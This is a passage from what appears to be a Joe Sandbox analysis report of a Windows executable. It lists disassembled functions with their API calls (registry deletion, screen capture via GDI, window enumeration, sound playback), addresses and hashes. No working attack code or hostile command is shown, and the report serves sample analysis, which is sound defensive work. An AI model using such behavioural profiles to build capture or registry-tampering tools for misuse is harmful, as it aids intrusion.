                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BB6F4
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BB772
                        • RegDeleteValueW.ADVAPI32(?,?), ref: 003BB80A
                        • RegCloseKey.ADVAPI32(?), ref: 003BB87E
                        • RegCloseKey.ADVAPI32(?), ref: 003BB89C
                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 003BB8F2
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003BB904
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 003BB922
                        • FreeLibrary.KERNEL32(00000000), ref: 003BB983
                        • RegCloseKey.ADVAPI32(00000000), ref: 003BB994
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 146587525-4033151799
                        • Opcode ID: 4b315ca804c4b4b1902c199458acc86794bafd1ee74d1eb6995fd2a60756bf34
                        • Instruction ID: f9f510fb033d6afbcb4213ee6e6b8c3293e8fcb49172fa0a99ab916e0d7f9c15
                        • Opcode Fuzzy Hash: 4b315ca804c4b4b1902c199458acc86794bafd1ee74d1eb6995fd2a60756bf34
                        • Instruction Fuzzy Hash: 93C19D34208201AFD712DF14C495F6AFBE5FF84318F15849CE69A8B6A2CBB1ED45CB91
                        Function 003B255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 003B25D8
                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003B25E8
                        • CreateCompatibleDC.GDI32(?), ref: 003B25F4
                        • SelectObject.GDI32(00000000,?), ref: 003B2601
                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 003B266D
                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003B26AC
                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003B26D0
                        • SelectObject.GDI32(?,?), ref: 003B26D8
                        • DeleteObject.GDI32(?), ref: 003B26E1
                        • DeleteDC.GDI32(?), ref: 003B26E8
                        • ReleaseDC.USER32(00000000,?), ref: 003B26F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                        • String ID: (
                        • API String ID: 2598888154-3887548279
                        • Opcode ID: 98b283260db71faae90a20767b067716d61e20c3b69e3b8276ebd869edb65e5b
                        • Instruction ID: a6b80b54b716300d19dbed2ed2fd355c3818698280649b8ccc60aca294d095be
                        • Opcode Fuzzy Hash: 98b283260db71faae90a20767b067716d61e20c3b69e3b8276ebd869edb65e5b
                        • Instruction Fuzzy Hash: F161E275D00219EFCB05CFA8D884EAEBBB9FF48310F248529EA59A7650D770A951CF50
                        Function 0036DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 0036DAA1
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D659
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D66B
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D67D
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D68F
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6A1
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6B3
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6C5
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6D7
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6E9
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6FB
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D70D
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D71F
                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D731
                        • _free.LIBCMT ref: 0036DA96
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 0036DAB8
                        • _free.LIBCMT ref: 0036DACD
                        • _free.LIBCMT ref: 0036DAD8
                        • _free.LIBCMT ref: 0036DAFA
                        • _free.LIBCMT ref: 0036DB0D
                        • _free.LIBCMT ref: 0036DB1B
                        • _free.LIBCMT ref: 0036DB26
                        • _free.LIBCMT ref: 0036DB5E
                        • _free.LIBCMT ref: 0036DB65
                        • _free.LIBCMT ref: 0036DB82
                        • _free.LIBCMT ref: 0036DB9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        • Opcode ID: 278177196097487cac48de3a350a71367e66c0310c5230840ccae3f19cb8f322
                        • Instruction ID: dfc110e27de1b08c7e9c5d28a5194ca201564474e56af22a5237be7576bcf861
                        • Opcode Fuzzy Hash: 278177196097487cac48de3a350a71367e66c0310c5230840ccae3f19cb8f322
                        • Instruction Fuzzy Hash: A6315A31B046049FEB27AA79E845B6B77E9FF42350F16C419E449DB199DB30AC508720
                        Function 0039365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 0039369C
                        • _wcslen.LIBCMT ref: 003936A7
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00393797
                        • GetClassNameW.USER32(?,?,00000400), ref: 0039380C
                        • GetDlgCtrlID.USER32(?), ref: 0039385D
                        • GetWindowRect.USER32(?,?), ref: 00393882
                        • GetParent.USER32(?), ref: 003938A0
                        • ScreenToClient.USER32(00000000), ref: 003938A7
                        • GetClassNameW.USER32(?,?,00000100), ref: 00393921
                        • GetWindowTextW.USER32(?,?,00000400), ref: 0039395D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                        • String ID: %s%u
                        • API String ID: 4010501982-679674701
                        • Opcode ID: 5748febb2b875b52b7824c17dc473fbeb6ca6a0dd5ecd003dacd9614d32afd35
                        • Instruction ID: a648bcd9a0d8653c253dd18489b8d66cd5745203d74aaeb2d8ee2e2aad52fb8f
                        • Opcode Fuzzy Hash: 5748febb2b875b52b7824c17dc473fbeb6ca6a0dd5ecd003dacd9614d32afd35
                        • Instruction Fuzzy Hash: 1791B3B1204606AFDB1ADF64C885FEAF7A8FF44350F008529F999D6190DB30EA59CB91
                        Function 00394954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(?,?,00000400), ref: 00394994
                        • GetWindowTextW.USER32(?,?,00000400), ref: 003949DA
                        • _wcslen.LIBCMT ref: 003949EB
                        • CharUpperBuffW.USER32(?,00000000), ref: 003949F7
                        • _wcsstr.LIBVCRUNTIME ref: 00394A2C
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00394A64
                        • GetWindowTextW.USER32(?,?,00000400), ref: 00394A9D
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00394AE6
                        • GetClassNameW.USER32(?,?,00000400), ref: 00394B20
                        • GetWindowRect.USER32(?,?), ref: 00394B8B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                        • String ID: ThumbnailClass
                        • API String ID: 1311036022-1241985126
                        • Opcode ID: 210c1f81d6bb26001a7abf102b0a2b2a5b867d8f13517cefe66c46e7e29ed6d6
                        • Instruction ID: f5db9d029bac249ef57305214df8310d543c629ec440f2e50064f5608c127cc6
                        • Opcode Fuzzy Hash: 210c1f81d6bb26001a7abf102b0a2b2a5b867d8f13517cefe66c46e7e29ed6d6
                        • Instruction Fuzzy Hash: BA91A1721082059FDF06DF14C985FAA77E8FF84314F05846AFD899A196EB30ED46CBA1
                        Function 003C8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003C8D5A
                        • GetFocus.USER32 ref: 003C8D6A
                        • GetDlgCtrlID.USER32(00000000), ref: 003C8D75
                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 003C8E1D
                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003C8ECF
                        • GetMenuItemCount.USER32(?), ref: 003C8EEC
                        • GetMenuItemID.USER32(?,00000000), ref: 003C8EFC
                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003C8F2E
                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003C8F70
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003C8FA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                        • String ID: 0
                        • API String ID: 1026556194-4108050209
                        • Opcode ID: 333f74e9696a67a1a532d849124b240b1f44e314a6ac3ffae9aa781c12caf074
                        • Instruction ID: 234f33bd56213dbd3803d9b6c134c70a19ae7c1999002fbcd41038655583ccca
                        • Opcode Fuzzy Hash: 333f74e9696a67a1a532d849124b240b1f44e314a6ac3ffae9aa781c12caf074
                        • Instruction Fuzzy Hash: 58817B715083019BD712CF24D884EABBBE9FB89754F15092DF989DB291DB30EE01CBA1
                        Function 0039DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                        Download Yara Rule
                        APIs
                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0039DC20
                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0039DC46
                        • _wcslen.LIBCMT ref: 0039DC50
                        • _wcsstr.LIBVCRUNTIME ref: 0039DCA0
                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0039DCBC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                        • API String ID: 1939486746-1459072770
                        • Opcode ID: d18f318410fc90f8e61f625d9e0d6cfbf01247483632849f57e5f22fb4b68c51
                        • Instruction ID: 67e0d47ec28dfcf9665c95966379efb694eab1354ccf75ba46f845ddaed42042
                        • Opcode Fuzzy Hash: d18f318410fc90f8e61f625d9e0d6cfbf01247483632849f57e5f22fb4b68c51
                        • Instruction Fuzzy Hash: 71413332940204BAEB17AB748C47FFF77ACEF46751F14046AF904EA192EB74AD0187A4
                        Function 003BCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 003BCC64
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 003BCC8D
                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 003BCD48
                          • Part of subcall function 003BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 003BCCAA
                          • Part of subcall function 003BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 003BCCBD
                          • Part of subcall function 003BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003BCCCF
                          • Part of subcall function 003BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 003BCD05
                          • Part of subcall function 003BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 003BCD28
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 003BCCF3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2734957052-4033151799
                        • Opcode ID: 79634a6c6e22e14e546e98f3014191d0ce55a44d14f00d2020aead9a063b073f
                        • Instruction ID: a43ffb52aa72931739b60d47447d44d2582763403a39ff6c64ac50f65ac4f65f
                        • Opcode Fuzzy Hash: 79634a6c6e22e14e546e98f3014191d0ce55a44d14f00d2020aead9a063b073f
                        • Instruction Fuzzy Hash: 7C31A075911129BBD7328B51DC88EFFBB7CEF51744F001169EA0AE2100D6309A46DBA0
                        Function 0039E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • timeGetTime.WINMM ref: 0039E6B4
                          • Part of subcall function 0034E551: timeGetTime.WINMM(?,?,0039E6D4), ref: 0034E555
                        • Sleep.KERNEL32(0000000A), ref: 0039E6E1
                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0039E705
                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0039E727
                        • SetActiveWindow.USER32 ref: 0039E746
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0039E754
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0039E773
                        • Sleep.KERNEL32(000000FA), ref: 0039E77E
                        • IsWindow.USER32 ref: 0039E78A
                        • EndDialog.USER32(00000000), ref: 0039E79B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                        • String ID: BUTTON
                        • API String ID: 1194449130-3405671355
                        • Opcode ID: be737da9fb929e383571a955436125f0c82f3ae6c695beee5843a908c82b4f26
                        • Instruction ID: ebb1aa120ed037245db8b26b3c5e69ffd9e376789b486543b344a98aa56c72f4
                        • Opcode Fuzzy Hash: be737da9fb929e383571a955436125f0c82f3ae6c695beee5843a908c82b4f26
                        • Instruction Fuzzy Hash: EE2150B0210205AFFF03AF61EE8DE253B6DF755748F181834F915E15A1DBB2AC408B19
                        Function 0039E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0039EA5D
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0039EA73
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0039EA84
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0039EA96
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0039EAA7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: SendString$_wcslen
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2420728520-1007645807
                        • Opcode ID: 7af52402bff7cbbd550038b61d434d240f5be0d11ed818a6f214b1214d44723a
                        • Instruction ID: 18d869fd9af7cc97c36932f1d242e6ef5431f4344e293f3f38239a94e9d51967
                        • Opcode Fuzzy Hash: 7af52402bff7cbbd550038b61d434d240f5be0d11ed818a6f214b1214d44723a
                        • Instruction Fuzzy Hash: 84117331A9025D79EB22E7A1DC8AEFF6A7CEBD1B00F404429F501A60E1EFB05D05C6B0
                        Function 00395CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 00395CE2
                        • GetWindowRect.USER32(00000000,?), ref: 00395CFB
                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00395D59
                        • GetDlgItem.USER32(?,00000002), ref: 00395D69
                        • GetWindowRect.USER32(00000000,?), ref: 00395D7B
                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00395DCF
                        • GetDlgItem.USER32(?,000003E9), ref: 00395DDD
                        • GetWindowRect.USER32(00000000,?), ref: 00395DEF
                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00395E31
                        • GetDlgItem.USER32(?,000003EA), ref: 00395E44
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00395E5A
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00395E67
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: bbbb8b30795dc8d805294a2373fde12f5eb007d78286525bd5acc2dfcad9a973
                        • Instruction ID: c04fe0b5d07e128d35d6adc3ca1b8750af2a824d7ed06abfefab392f042b5ac9
                        • Opcode Fuzzy Hash: bbbb8b30795dc8d805294a2373fde12f5eb007d78286525bd5acc2dfcad9a973
                        • Instruction Fuzzy Hash: 2F512DB1B10605AFDF19DF68CD89EAEBBB9FB48300F148129F519E6290D770AE40CB50
                        Function 00348BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00348F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00348BE8,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 00348FC5
                        • DestroyWindow.USER32(?), ref: 00348C81
                        • KillTimer.USER32(00000000,?,?,?,?,00348BBA,00000000,?), ref: 00348D1B
                        • DestroyAcceleratorTable.USER32(00000000), ref: 00386973
                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 003869A1
                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 003869B8
                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000), ref: 003869D4
                        • DeleteObject.GDI32(00000000), ref: 003869E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                        • String ID:
                        • API String ID: 641708696-0
                        • Opcode ID: 4a9aebc986ef8dc2a303b0086e883644fab3776a2c94a49019d18cd8acee7a59
                        • Instruction ID: 8e0e7c5f1bcc7f64df366fd208e21300ea2487ed63d62ca343bf45ee07faaff3
                        • Opcode Fuzzy Hash: 4a9aebc986ef8dc2a303b0086e883644fab3776a2c94a49019d18cd8acee7a59
                        • Instruction Fuzzy Hash: 36617871502710DFCB27AF14DA89B29B7F5FB40312F159568E046AA9B0CB35BD90CF94
                        Function 00349838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                        • GetSysColor.USER32(0000000F), ref: 00349862
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
